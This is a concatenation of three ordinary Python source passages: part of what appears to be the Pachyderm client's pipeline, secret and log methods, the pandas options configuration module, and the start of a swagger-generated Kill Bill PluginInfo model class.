meaning if `update` is ``True``.
service : pps_proto.Service, optional
Creates a Service pipeline instead of a normal pipeline.
datum_set_spec : pps_proto.DatumSetSpec, optional
Specifies how a pipeline should split its datums into datum sets.
datum_timeout : duration_pb2.Duration, optional
The maximum execution time allowed for each datum.
job_timeout : duration_pb2.Duration, optional
The maximum execution time allowed for a job.
salt : str, optional
A tag for the pipeline.
datum_tries : int, optional
The number of times a job attempts to run on a datum when a failure
occurs.
scheduling_spec : pps_proto.SchedulingSpec, optional
Specifies how the pods for a pipeline should be scheduled.
pod_patch : str, optional
Allows one to set fields in the pod spec that haven't been
explicitly exposed in the rest of the pipeline spec.
spout : pps_proto.Spout, optional
Creates a Spout pipeline instead of a normal pipeline.
spec_commit : pfs_proto.Commit, optional
A spec commit to base the pipeline spec from.
metadata : pps_proto.Metadata, optional
Kubernetes labels and annotations to add as metadata to the
pipeline pods.
autoscaling : bool, optional
If true, automatically scales the worker pool based on the datums
it has to process.
Notes
-----
If creating a Spout pipeline, when committing data to the repo, use
commit methods (``client.commit()``, ``client.start_commit()``, etc.)
or :class:`.ModifyFileClient` methods (``mfc.put_file_from_bytes``,
``mfc.delete_file()``, etc.)
For other pipelines, when committing data to the repo, write out to
``/pfs/out/``.
Examples
--------
>>> client.create_pipeline(
... "foo",
... transform=pps_proto.Transform(
... cmd=["python3", "main.py"],
... image="example/image",
... ),
... input=pps_proto.Input(pfs=pps_proto.PFSInput(
... repo="foo",
... branch="master",
... glob="/*"
... ))
... )
"""
self._req(
Service.PPS,
"CreatePipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
transform=transform,
parallelism_spec=parallelism_spec,
egress=egress,
update=update,
output_branch=output_branch_name,
s3_out=s3_out,
resource_requests=resource_requests,
resource_limits=resource_limits,
sidecar_resource_limits=sidecar_resource_limits,
input=input,
description=description,
reprocess=reprocess,
metadata=metadata,
service=service,
datum_set_spec=datum_set_spec,
datum_timeout=datum_timeout,
job_timeout=job_timeout,
salt=salt,
datum_tries=datum_tries,
scheduling_spec=scheduling_spec,
pod_patch=pod_patch,
spout=spout,
spec_commit=spec_commit,
reprocess_spec=reprocess_spec,
autoscaling=autoscaling,
)
def create_pipeline_from_request(
self, req: pps_proto.CreatePipelineRequest
) -> None:
"""Creates a pipeline from a ``CreatePipelineRequest`` object. Usually
used in conjunction with ``util.parse_json_pipeline_spec()`` or
``util.parse_dict_pipeline_spec()``.
Parameters
----------
req : pps_proto.CreatePipelineRequest
The ``CreatePipelineRequest`` object.
"""
self._req(Service.PPS, "CreatePipeline", req=req)
def inspect_pipeline(
self, pipeline_name: str, history: int = 0, details: bool = False
) -> Iterator[pps_proto.PipelineInfo]:
""".. # noqa: W505
Inspects a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
history : int, optional
Indicates to return historical versions of `pipeline_name`.
Semantics are:
- 0: Return current version of `pipeline_name`
- 1: Return the above and `pipeline_name` from the next most recent version.
- 2: etc.
- -1: Return all historical versions of `pipeline_name`.
details : bool, optional
If true, return pipeline details.
Returns
-------
Iterator[pps_proto.PipelineInfo]
An iterator of protobuf objects that contain info on a pipeline.
Examples
--------
>>> pipeline = next(client.inspect_pipeline("foo"))
...
>>> for p in client.inspect_pipeline("foo", 2):
>>> print(p)
"""
if history == 0:
return iter(
[
self._req(
Service.PPS,
"InspectPipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
details=details,
)
]
)
else:
# `InspectPipeline` doesn't support history, but `ListPipeline`
# with a pipeline filter does, so we use that here
return self._req(
Service.PPS,
"ListPipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
history=history,
details=details,
)
def list_pipeline(
self, history: int = 0, details: bool = False, jqFilter: str = None
) -> Iterator[pps_proto.PipelineInfo]:
""".. # noqa: W505
Lists pipelines.
Parameters
----------
history : int, optional
Indicates to return historical versions of `pipeline_name`.
Semantics are:
- 0: Return current version of `pipeline_name`
- 1: Return the above and `pipeline_name` from the next most recent version.
- 2: etc.
- -1: Return all historical versions of `pipeline_name`.
details : bool, optional
If true, return pipeline details.
jqFilter : str, optional
A ``jq`` filter that can filter the list of pipelines returned.
Returns
-------
Iterator[pps_proto.PipelineInfo]
An iterator of protobuf objects that contain info on a pipeline.
Examples
--------
>>> pipelines = list(client.list_pipeline())
"""
return self._req(
Service.PPS,
"ListPipeline",
history=history,
details=details,
jqFilter=jqFilter,
)
def delete_pipeline(
self, pipeline_name: str, force: bool = False, keep_repo: bool = False
) -> None:
"""Deletes a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
force : bool, optional
If true, forces the pipeline deletion.
keep_repo : bool, optional
If true, keeps the output repo.
"""
self._req(
Service.PPS,
"DeletePipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
force=force,
keep_repo=keep_repo,
)
def delete_all_pipelines(self) -> None:
"""Deletes all pipelines."""
self._req(
Service.PPS,
"DeleteAll",
req=empty_pb2.Empty(),
)
def start_pipeline(self, pipeline_name: str) -> None:
"""Starts a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
"""
self._req(
Service.PPS,
"StartPipeline",
pipeline=pps_proto.Pipeline(name=pipeline_name),
)
def stop_pipeline(self, pipeline_name: str) -> None:
"""Stops a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
"""
self._req(
Service.PPS, "StopPipeline", pipeline=pps_proto.Pipeline(name=pipeline_name)
)
def run_cron(self, pipeline_name: str) -> None:
"""Triggers a cron pipeline to run now.
For more info on cron pipelines:
https://docs.pachyderm.com/latest/concepts/pipeline-concepts/pipeline/cron/
Parameters
----------
pipeline_name : str
The name of the pipeline.
"""
self._req(
Service.PPS,
"RunCron",
pipeline=pps_proto.Pipeline(name=pipeline_name),
)
def create_secret(
self,
secret_name: str,
data: Dict[str, Union[str, bytes]],
labels: Dict[str, str] = None,
annotations: Dict[str, str] = None,
) -> None:
"""Creates a new secret.
Parameters
----------
secret_name : str
The name of the secret.
data : Dict[str, Union[str, bytes]]
The data to store in the secret. Each key must consist of
alphanumeric characters ``-``, ``_`` or ``.``.
labels : Dict[str, str], optional
Kubernetes labels to attach to the secret.
annotations : Dict[str, str], optional
Kubernetes annotations to attach to the secret.
"""
encoded_data = {}
for k, v in data.items():
if isinstance(v, str):
v = v.encode("utf8")
encoded_data[k] = base64.b64encode(v).decode("utf8")
f = json.dumps(
{
"kind": "Secret",
"apiVersion": "v1",
"metadata": {
"name": secret_name,
"labels": labels,
"annotations": annotations,
},
"data": encoded_data,
}
).encode("utf8")
self._req(Service.PPS, "CreateSecret", file=f)
def delete_secret(self, secret_name: str) -> None:
"""Deletes a secret.
Parameters
----------
secret_name : str
The name of the secret.
"""
secret = pps_proto.Secret(name=secret_name)
self._req(Service.PPS, "DeleteSecret", secret=secret)
def list_secret(self) -> List[pps_proto.SecretInfo]:
"""Lists secrets.
Returns
-------
List[pps_proto.SecretInfo]
A list of protobuf objects that contain info on a secret.
"""
return self._req(
Service.PPS,
"ListSecret",
req=empty_pb2.Empty(),
).secret_info
def inspect_secret(self, secret_name: str) -> pps_proto.SecretInfo:
"""Inspects a secret.
Parameters
----------
secret_name : str
The name of the secret.
Returns
-------
pps_proto.SecretInfo
A protobuf object with info on the secret.
"""
secret = pps_proto.Secret(name=secret_name)
return self._req(Service.PPS, "InspectSecret", secret=secret)
def get_pipeline_logs(
self,
pipeline_name: str,
data_filters: List[str] = None,
master: bool = False,
datum: pps_proto.Datum = None,
follow: bool = False,
tail: int = 0,
use_loki_backend: bool = False,
since: duration_pb2.Duration = None,
) -> Iterator[pps_proto.LogMessage]:
"""Gets logs for a pipeline.
Parameters
----------
pipeline_name : str
The name of the pipeline.
data_filters : List[str], optional
A list of the names of input files from which we want processing
logs. This may contain multiple files, in case `pipeline_name`
contains multiple inputs. Each filter may be an absolute path of a
file within a repo, or it may be a hash for that file (to search
for files at specific versions).
master : bool, optional
If true, includes logs from the master
datum : pps_proto.Datum, optional
Filters log lines for the specified datum.
follow : bool, optional
If true, continue to follow new logs as they appear.
tail : int, optional
If nonzero, the number of lines from the end of the logs to return.
Note: tail applies per container, so you will get
`tail` * <number of pods> total lines back.
use_loki_backend : bool, optional
If true, use loki as a backend, rather than Kubernetes, for
fetching logs. Requires a loki-enabled cluster.
since : duration_pb2.Duration, optional
Specifies how far in the past to return logs from.
Returns
-------
Iterator[pps_proto.LogMessage]
An iterator of protobuf objects that contain info on a log from a
PPS worker. If `follow` is set to ``True``, use ``next()`` to
iterate through as the returned stream is potentially endless.
Might block your code otherwise.
"""
return self._req(
Service.PPS,
"GetLogs",
pipeline=pps_proto.Pipeline(name=pipeline_name),
data_filters=data_filters,
master=master,
datum=datum,
follow=follow,
tail=tail,
use_loki_backend=use_loki_backend,
since=since,
)
def get_job_logs(
self,
pipeline_name: str,
job_id: str,
data_filters: List[str] = None,
datum: pps_proto.Datum = None,
follow: bool = False,
tail: int = 0,
use_loki_backend: bool = False,
since: duration_pb2.Duration = None,
) -> Iterator[pps_proto.LogMessage]:
"""Gets logs for a job.
Parameters
----------
pipeline_name : str
The name of the pipeline.
job_id : str
The ID of the job.
data_filters : List[str], optional
A list of the names of input files from which we want processing
logs. This may contain multiple files, in case `pipeline_name`
contains multiple inputs. Each filter may be an absolute path of a
file within a repo, or it may be a hash for that file (to search
for files at specific versions).
datum : pps_proto.Datum, optional
Filters log lines for the specified datum.
follow : bool, optional
If true, continue to follow new logs as they appear.
tail : int, optional
If nonzero, the number of lines from the end of the logs to return.
Note: tail applies per container, so you will get
`tail` * <number of pods> total lines back.
use_loki_backend : bool, optional
If true, use loki as a backend, rather than Kubernetes, for
fetching logs. Requires a loki-enabled cluster.
since : duration_pb2.Duration, optional
Specifies how far in the past to return logs from.
Returns
-------
Iterator[pps_proto.LogMessage]
An iterator of protobuf objects that contain info on a log from a
PPS worker. If `follow` is set to ``True``, use ``next()`` to
iterate through as the returned stream is potentially endless.
Might block your code otherwise.
"""
return self._req(
Service.PPS,
"GetLogs",
job=pps_proto.Job(
pipeline=pps_proto.Pipeline(name=pipeline_name), id=job_id
),
data_filters=data_filters,
datum=datum,
follow=follow,
tail=tail,
use_loki_backend=use_loki_backend,
since=since,
)
|
|
"""
The config module holds package-wide configurables and provides
a uniform API for working with them.
Overview
========
This module supports the following requirements:
- options are referenced using keys in dot.notation, e.g. "x.y.option - z".
- keys are case-insensitive.
- functions should accept partial/regex keys, when unambiguous.
- options can be registered by modules at import time.
- options can be registered at init-time (via core.config_init)
- options have a default value, and (optionally) a description and
validation function associated with them.
- options can be deprecated, in which case referencing them
should produce a warning.
- deprecated options can optionally be rerouted to a replacement
so that accessing a deprecated option reroutes to a differently
named option.
- options can be reset to their default value.
- all option can be reset to their default value at once.
- all options in a certain sub - namespace can be reset at once.
- the user can set / get / reset or ask for the description of an option.
- a developer can register and mark an option as deprecated.
- you can register a callback to be invoked when the option value
is set or reset. Changing the stored value is considered misuse, but
is not verboten.
Implementation
==============
- Data is stored using nested dictionaries, and should be accessed
through the provided API.
- "Registered options" and "Deprecated options" have metadata associated
with them, which are stored in auxiliary dictionaries keyed on the
fully-qualified key, e.g. "x.y.z.option".
- the config_init module is imported by the package's __init__.py file.
placing any register_option() calls there will ensure those options
are available as soon as pandas is loaded. If you use register_option
in a module, it will only be available after that module is imported,
which you should be aware of.
- `config_prefix` is a context_manager (for use with the `with` keyword)
which can save developers some typing, see the docstring.
"""
import re
from collections import namedtuple
from contextlib import contextmanager
import warnings
from pandas.compat import map, lmap, u
import pandas.compat as compat
DeprecatedOption = namedtuple('DeprecatedOption', 'key msg rkey removal_ver')
RegisteredOption = namedtuple('RegisteredOption',
'key defval doc validator cb')
_deprecated_options = {} # holds deprecated option metdata
_registered_options = {} # holds registered option metdata
_global_config = {} # holds the current values for registered options
_reserved_keys = ['all'] # keys which have a special meaning
class OptionError(AttributeError, KeyError):
"""Exception for pandas.options, backwards compatible with KeyError
checks
"""
#
# User API
def _get_single_key(pat, silent):
keys = _select_options(pat)
if len(keys) == 0:
if not silent:
_warn_if_deprecated(pat)
raise OptionError('No such keys(s): {pat!r}'.format(pat=pat))
if len(keys) > 1:
raise OptionError('Pattern matched multiple keys')
key = keys[0]
if not silent:
_warn_if_deprecated(key)
key = _translate_key(key)
return key
def _get_option(pat, silent=False):
key = _get_single_key(pat, silent)
# walk the nested dict
root, k = _get_root(key)
return root[k]
def _set_option(*args, **kwargs):
# must at least 1 arg deal with constraints later
nargs = len(args)
if not nargs or nargs % 2 != 0:
raise ValueError("Must provide an even number of non-keyword "
"arguments")
# default to false
silent = kwargs.pop('silent', False)
if kwargs:
msg = '_set_option() got an unexpected keyword argument "{kwarg}"'
raise TypeError(msg.format(list(kwargs.keys())[0]))
for k, v in zip(args[::2], args[1::2]):
key = _get_single_key(k, silent)
o = _get_registered_option(key)
if o and o.validator:
o.validator(v)
# walk the nested dict
root, k = _get_root(key)
root[k] = v
if o.cb:
if silent:
with warnings.catch_warnings(record=True):
o.cb(key)
else:
o.cb(key)
def _describe_option(pat='', _print_desc=True):
keys = _select_options(pat)
if len(keys) == 0:
raise OptionError('No such keys(s)')
s = u('')
for k in keys: # filter by pat
s += _build_option_description(k)
if _print_desc:
print(s)
else:
return s
def _reset_option(pat, silent=False):
keys = _select_options(pat)
if len(keys) == 0:
raise OptionError('No such keys(s)')
if len(keys) > 1 and len(pat) < 4 and pat != 'all':
raise ValueError('You must specify at least 4 characters when '
'resetting multiple keys, use the special keyword '
'"all" to reset all the options to their default '
'value')
for k in keys:
_set_option(k, _registered_options[k].defval, silent=silent)
def get_default_val(pat):
key = _get_single_key(pat, silent=True)
return _get_registered_option(key).defval
class DictWrapper(object):
""" provide attribute-style access to a nested dict"""
def __init__(self, d, prefix=""):
object.__setattr__(self, "d", d)
object.__setattr__(self, "prefix", prefix)
def __setattr__(self, key, val):
prefix = object.__getattribute__(self, "prefix")
if prefix:
prefix += "."
prefix += key
# you can't set new keys
# can you can't overwrite subtrees
if key in self.d and not isinstance(self.d[key], dict):
_set_option(prefix, val)
else:
raise OptionError("You can only set the value of existing options")
def __getattr__(self, key):
prefix = object.__getattribute__(self, "prefix")
if prefix:
prefix += "."
prefix += key
try:
v = object.__getattribute__(self, "d")[key]
except KeyError:
raise OptionError("No such option")
if isinstance(v, dict):
return DictWrapper(v, prefix)
else:
return _get_option(prefix)
def __dir__(self):
return list(self.d.keys())
# For user convenience, we'd like to have the available options described
# in the docstring. For dev convenience we'd like to generate the docstrings
# dynamically instead of maintaining them by hand. To this, we use the
# class below which wraps functions inside a callable, and converts
# __doc__ into a property function. The doctsrings below are templates
# using the py2.6+ advanced formatting syntax to plug in a concise list
# of options, and option descriptions.
class CallableDynamicDoc(object):
def __init__(self, func, doc_tmpl):
self.__doc_tmpl__ = doc_tmpl
self.__func__ = func
def __call__(self, *args, **kwds):
return self.__func__(*args, **kwds)
@property
def __doc__(self):
opts_desc = _describe_option('all', _print_desc=False)
opts_list = pp_options_list(list(_registered_options.keys()))
return self.__doc_tmpl__.format(opts_desc=opts_desc,
opts_list=opts_list)
_get_option_tmpl = """
get_option(pat)
Retrieves the value of the specified option.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp which should match a single option.
Note: partial matches are supported for convenience, but unless you use the
full option name (e.g. x.y.z.option_name), your code may break in future
versions if new options with similar names are introduced.
Returns
-------
result : the value of the option
Raises
------
OptionError : if no such option exists
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
_set_option_tmpl = """
set_option(pat, value)
Sets the value of the specified option.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp which should match a single option.
Note: partial matches are supported for convenience, but unless you use the
full option name (e.g. x.y.z.option_name), your code may break in future
versions if new options with similar names are introduced.
value :
new value of option.
Returns
-------
None
Raises
------
OptionError if no such option exists
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
_describe_option_tmpl = """
describe_option(pat, _print_desc=False)
Prints the description for one or more registered options.
Call with not arguments to get a listing for all registered options.
Available options:
{opts_list}
Parameters
----------
pat : str
Regexp pattern. All matching keys will have their description displayed.
_print_desc : bool, default True
If True (default) the description(s) will be printed to stdout.
Otherwise, the description(s) will be returned as a unicode string
(for testing).
Returns
-------
None by default, the description(s) as a unicode string if _print_desc
is False
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
_reset_option_tmpl = """
reset_option(pat)
Reset one or more options to their default value.
Pass "all" as argument to reset all options.
Available options:
{opts_list}
Parameters
----------
pat : str/regex
If specified only options matching `prefix*` will be reset.
Note: partial matches are supported for convenience, but unless you
use the full option name (e.g. x.y.z.option_name), your code may break
in future versions if new options with similar names are introduced.
Returns
-------
None
Notes
-----
The available options with its descriptions:
{opts_desc}
"""
# bind the functions with their docstrings into a Callable
# and use that as the functions exposed in pd.api
get_option = CallableDynamicDoc(_get_option, _get_option_tmpl)
set_option = CallableDynamicDoc(_set_option, _set_option_tmpl)
reset_option = CallableDynamicDoc(_reset_option, _reset_option_tmpl)
describe_option = CallableDynamicDoc(_describe_option, _describe_option_tmpl)
options = DictWrapper(_global_config)
#
# Functions for use by pandas developers, in addition to User - api
class option_context(object):
"""
Context manager to temporarily set options in the `with` statement context.
You need to invoke as ``option_context(pat, val, [(pat, val), ...])``.
Examples
--------
>>> with option_context('display.max_rows', 10, 'display.max_columns', 5):
... ...
"""
def __init__(self, *args):
if not (len(args) % 2 == 0 and len(args) >= 2):
raise ValueError('Need to invoke as'
' option_context(pat, val, [(pat, val), ...]).')
self.ops = list(zip(args[::2], args[1::2]))
def __enter__(self):
undo = []
for pat, val in self.ops:
undo.append((pat, _get_option(pat, silent=True)))
self.undo = undo
for pat, val in self.ops:
_set_option(pat, val, silent=True)
def __exit__(self, *args):
if self.undo:
for pat, val in self.undo:
_set_option(pat, val, silent=True)
def register_option(key, defval, doc='', validator=None, cb=None):
"""Register an option in the package-wide pandas config object
Parameters
----------
key - a fully-qualified key, e.g. "x.y.option - z".
defval - the default value of the option
doc - a string description of the option
validator - a function of a single argument, should raise `ValueError` if
called with a value which is not a legal value for the option.
cb - a function of a single argument "key", which is called
immediately after an option value is set/reset. key is
the full name of the option.
Returns
-------
Nothing.
Raises
------
ValueError if `validator` is specified and `defval` is not a valid value.
"""
import tokenize
import keyword
key = key.lower()
if key in _registered_options:
msg = "Option '{key}' has already been registered"
raise OptionError(msg.format(key=key))
if key in _reserved_keys:
msg = "Option '{key}' is a reserved key"
raise OptionError(msg.format(key=key))
# the default value should be legal
if validator:
validator(defval)
# walk the nested dict, creating dicts as needed along the path
path = key.split('.')
for k in path:
if not bool(re.match('^' + tokenize.Name + '$', k)):
raise ValueError("{k} is not a valid identifier".format(k=k))
if keyword.iskeyword(k):
raise ValueError("{k} is a python keyword".format(k=k))
cursor = _global_config
msg = "Path prefix to option '{option}' is already an option"
for i, p in enumerate(path[:-1]):
if not isinstance(cursor, dict):
raise OptionError(msg.format(option='.'.join(path[:i])))
if p not in cursor:
cursor[p] = {}
cursor = cursor[p]
if not isinstance(cursor, dict):
raise OptionError(msg.format(option='.'.join(path[:-1])))
cursor[path[-1]] = defval # initialize
# save the option metadata
_registered_options[key] = RegisteredOption(key=key, defval=defval,
doc=doc, validator=validator,
cb=cb)
def deprecate_option(key, msg=None, rkey=None, removal_ver=None):
"""
Mark option `key` as deprecated, if code attempts to access this option,
a warning will be produced, using `msg` if given, or a default message
if not.
if `rkey` is given, any access to the key will be re-routed to `rkey`.
Neither the existence of `key` nor that if `rkey` is checked. If they
do not exist, any subsequence access will fail as usual, after the
deprecation warning is given.
Parameters
----------
key - the name of the option to be deprecated. must be a fully-qualified
option name (e.g "x.y.z.rkey").
msg - (Optional) a warning message to output when the key is referenced.
if no message is given a default message will be emitted.
rkey - (Optional) the name of an option to reroute access to.
If specified, any referenced `key` will be re-routed to `rkey`
including set/get/reset.
rkey must be a fully-qualified option name (e.g "x.y.z.rkey").
used by the default message if no `msg` is specified.
removal_ver - (Optional) specifies the version in which this option will
be removed. used by the default message if no `msg`
is specified.
Returns
-------
Nothing
Raises
------
OptionError - if key has already been deprecated.
"""
key = key.lower()
if key in _deprecated_options:
msg = "Option '{key}' has already been defined as deprecated."
raise OptionError(msg.format(key=key))
_deprecated_options[key] = DeprecatedOption(key, msg, rkey, removal_ver)
#
# functions internal to the module
def _select_options(pat):
"""returns a list of keys matching `pat`
if pat=="all", returns all registered options
"""
# short-circuit for exact key
if pat in _registered_options:
return [pat]
# else look through all of them
keys = sorted(_registered_options.keys())
if pat == 'all': # reserved key
return keys
return [k for k in keys if re.search(pat, k, re.I)]
def _get_root(key):
path = key.split('.')
cursor = _global_config
for p in path[:-1]:
cursor = cursor[p]
return cursor, path[-1]
def _is_deprecated(key):
""" Returns True if the given option has been deprecated """
key = key.lower()
return key in _deprecated_options
def _get_deprecated_option(key):
"""
Retrieves the metadata for a deprecated option, if `key` is deprecated.
Returns
-------
DeprecatedOption (namedtuple) if key is deprecated, None otherwise
"""
try:
d = _deprecated_options[key]
except KeyError:
return None
else:
return d
def _get_registered_option(key):
"""
Retrieves the option metadata if `key` is a registered option.
Returns
-------
RegisteredOption (namedtuple) if key is deprecated, None otherwise
"""
return _registered_options.get(key)
def _translate_key(key):
"""
if key id deprecated and a replacement key defined, will return the
replacement key, otherwise returns `key` as - is
"""
d = _get_deprecated_option(key)
if d:
return d.rkey or key
else:
return key
def _warn_if_deprecated(key):
"""
Checks if `key` is a deprecated option and if so, prints a warning.
Returns
-------
bool - True if `key` is deprecated, False otherwise.
"""
d = _get_deprecated_option(key)
if d:
if d.msg:
print(d.msg)
warnings.warn(d.msg, FutureWarning)
else:
msg = "'{key}' is deprecated".format(key=key)
if d.removal_ver:
msg += (' and will be removed in {version}'
.format(version=d.removal_ver))
if d.rkey:
msg += ", please use '{rkey}' instead.".format(rkey=d.rkey)
else:
msg += ', please refrain from using it.'
warnings.warn(msg, FutureWarning)
return True
return False
def _build_option_description(k):
""" Builds a formatted description of a registered option and prints it """
o = _get_registered_option(k)
d = _get_deprecated_option(k)
s = u('{k} ').format(k=k)
if o.doc:
s += '\n'.join(o.doc.strip().split('\n'))
else:
s += 'No description available.'
if o:
s += (u('\n [default: {default}] [currently: {current}]')
.format(default=o.defval, current=_get_option(k, True)))
if d:
s += u('\n (Deprecated')
s += (u(', use `{rkey}` instead.')
.format(rkey=d.rkey if d.rkey else ''))
s += u(')')
s += '\n\n'
return s
def pp_options_list(keys, width=80, _print=False):
""" Builds a concise listing of available options, grouped by prefix """
from textwrap import wrap
from itertools import groupby
def pp(name, ks):
pfx = ('- ' + name + '.[' if name else '')
ls = wrap(', '.join(ks), width, initial_indent=pfx,
subsequent_indent=' ', break_long_words=False)
if ls and ls[-1] and name:
ls[-1] = ls[-1] + ']'
return ls
ls = []
singles = [x for x in sorted(keys) if x.find('.') < 0]
if singles:
ls += pp('', singles)
keys = [x for x in keys if x.find('.') >= 0]
for k, g in groupby(sorted(keys), lambda x: x[:x.rfind('.')]):
ks = [x[len(k) + 1:] for x in list(g)]
ls += pp(k, ks)
s = '\n'.join(ls)
if _print:
print(s)
else:
return s
#
# helpers
@contextmanager
def config_prefix(prefix):
"""contextmanager for multiple invocations of API with a common prefix
supported API functions: (register / get / set )__option
Warning: This is not thread - safe, and won't work properly if you import
the API functions into your module using the "from x import y" construct.
Example:
import pandas.core.config as cf
with cf.config_prefix("display.font"):
cf.register_option("color", "red")
cf.register_option("size", " 5 pt")
cf.set_option(size, " 6 pt")
cf.get_option(size)
...
etc'
will register options "display.font.color", "display.font.size", set the
value of "display.font.size"... and so on.
"""
# Note: reset_option relies on set_option, and on key directly
# it does not fit in to this monkey-patching scheme
global register_option, get_option, set_option, reset_option
def wrap(func):
def inner(key, *args, **kwds):
pkey = '{prefix}.{key}'.format(prefix=prefix, key=key)
return func(pkey, *args, **kwds)
return inner
_register_option = register_option
_get_option = get_option
_set_option = set_option
set_option = wrap(set_option)
get_option = wrap(get_option)
register_option = wrap(register_option)
yield None
set_option = _set_option
get_option = _get_option
register_option = _register_option
# These factories and methods are handy for use as the validator
# arg in register_option
def is_type_factory(_type):
"""
Parameters
----------
`_type` - a type to be compared against (e.g. type(x) == `_type`)
Returns
-------
validator - a function of a single argument x , which raises
ValueError if type(x) is not equal to `_type`
"""
def inner(x):
if type(x) != _type:
msg = "Value must have type '{typ!s}'"
raise ValueError(msg.format(typ=_type))
return inner
def is_instance_factory(_type):
"""
Parameters
----------
`_type` - the type to be checked against
Returns
-------
validator - a function of a single argument x , which raises
ValueError if x is not an instance of `_type`
"""
if isinstance(_type, (tuple, list)):
_type = tuple(_type)
from pandas.io.formats.printing import pprint_thing
type_repr = "|".join(map(pprint_thing, _type))
else:
type_repr = "'{typ}'".format(typ=_type)
def inner(x):
if not isinstance(x, _type):
msg = "Value must be an instance of {type_repr}"
raise ValueError(msg.format(type_repr=type_repr))
return inner
def is_one_of_factory(legal_values):
callables = [c for c in legal_values if callable(c)]
legal_values = [c for c in legal_values if not callable(c)]
def inner(x):
from pandas.io.formats.printing import pprint_thing as pp
if x not in legal_values:
if not any(c(x) for c in callables):
pp_values = pp("|".join(lmap(pp, legal_values)))
msg = "Value must be one of {pp_values}"
if len(callables):
msg += " or a callable"
raise ValueError(msg.format(pp_values=pp_values))
return inner
# common type validators, for convenience
# usage: register_option(... , validator = is_int)
is_int = is_type_factory(int)
is_bool = is_type_factory(bool)
is_float = is_type_factory(float)
is_str = is_type_factory(str)
is_unicode = is_type_factory(compat.text_type)
is_text = is_instance_factory((str, bytes))
def is_callable(obj):
"""
Parameters
----------
`obj` - the object to be checked
Returns
-------
validator - returns True if object is callable
raises ValueError otherwise.
"""
if not callable(obj):
raise ValueError("Value must be a callable")
return True
|
|
# coding: utf-8
#
# Copyright 2010-2014 Ning, Inc.
# Copyright 2014-2020 Groupon, Inc
# Copyright 2020-2021 Equinix, Inc
# Copyright 2014-2021 The Billing Project, LLC
#
# The Billing Project, LLC licenses this file to you under the Apache License, version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Kill Bill
Kill Bill is an open-source billing and payments platform # noqa: E501
OpenAPI spec version: 0.22.22-SNAPSHOT
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class PluginInfo(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'bundle_symbolic_name': 'Str',
'plugin_key': 'Str',
'plugin_name': 'Str',
'version': 'Str',
'state': 'Str',
'is_selected_for_start': 'Bool',
'services': 'List[PluginServiceInfo]'
}
attribute_map = {
'bundle_symbolic_name': 'bundleSymbolicName',
'plugin_key': 'pluginKey',
'plugin_name': 'pluginName',
'version': 'version',
'state': 'state',
'is_selected_for_start': 'isSelectedForStart',
'services': 'services'
}
def __init__(self, bundle_symbolic_name=None, plugin_key=None, plugin_name=None, version=None, state=None, is_selected_for_start=None, services=None): # noqa: E501
"""PluginInfo - a model defined in Swagger""" # noqa: E501
self._bundle_symbolic_name = None
self._plugin_key = None
self._plugin_name = None
self._version = None
self._state = None
self._is_selected_for_start = None
self._services = None
self.discriminator = None
if bundle_symbolic_name is not None:
self.bundle_symbolic_name = bundle_symbolic_name
if plugin_key is not None:
self.plugin_key = plugin_key
if plugin_name is not None:
self.plugin_name = plugin_name
if version is not None:
self.version = version
if state is not None:
self.state = state
if is_selected_for_start is not None:
self.is_selected_for_start = is_selected_for_start
if services is not None:
self.services = services
@property
def bundle_symbolic_name(self):
"""Gets the bundle_symbolic_name of this PluginInfo. # noqa: E501
:return: The bundle_symbolic_name of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._bundle_symbolic_name
@bundle_symbolic_name.setter
def bundle_symbolic_name(self, bundle_symbolic_name):
"""Sets the bundle_symbolic_name of this PluginInfo.
:param bundle_symbolic_name: The bundle_symbolic_name of this PluginInfo. # noqa: E501
:type: Str
"""
self._bundle_symbolic_name = bundle_symbolic_name
@property
def plugin_key(self):
"""Gets the plugin_key of this PluginInfo. # noqa: E501
:return: The plugin_key of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._plugin_key
@plugin_key.setter
def plugin_key(self, plugin_key):
"""Sets the plugin_key of this PluginInfo.
:param plugin_key: The plugin_key of this PluginInfo. # noqa: E501
:type: Str
"""
self._plugin_key = plugin_key
@property
def plugin_name(self):
"""Gets the plugin_name of this PluginInfo. # noqa: E501
:return: The plugin_name of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._plugin_name
@plugin_name.setter
def plugin_name(self, plugin_name):
"""Sets the plugin_name of this PluginInfo.
:param plugin_name: The plugin_name of this PluginInfo. # noqa: E501
:type: Str
"""
self._plugin_name = plugin_name
@property
def version(self):
"""Gets the version of this PluginInfo. # noqa: E501
:return: The version of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this PluginInfo.
:param version: The version of this PluginInfo. # noqa: E501
:type: Str
"""
self._version = version
@property
def state(self):
"""Gets the state of this PluginInfo. # noqa: E501
:return: The state of this PluginInfo. # noqa: E501
:rtype: Str
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this PluginInfo.
:param state: The state of this PluginInfo. # noqa: E501
:type: Str
"""
self._state = state
@property
def is_selected_for_start(self):
"""Gets the is_selected_for_start of this PluginInfo. # noqa: E501
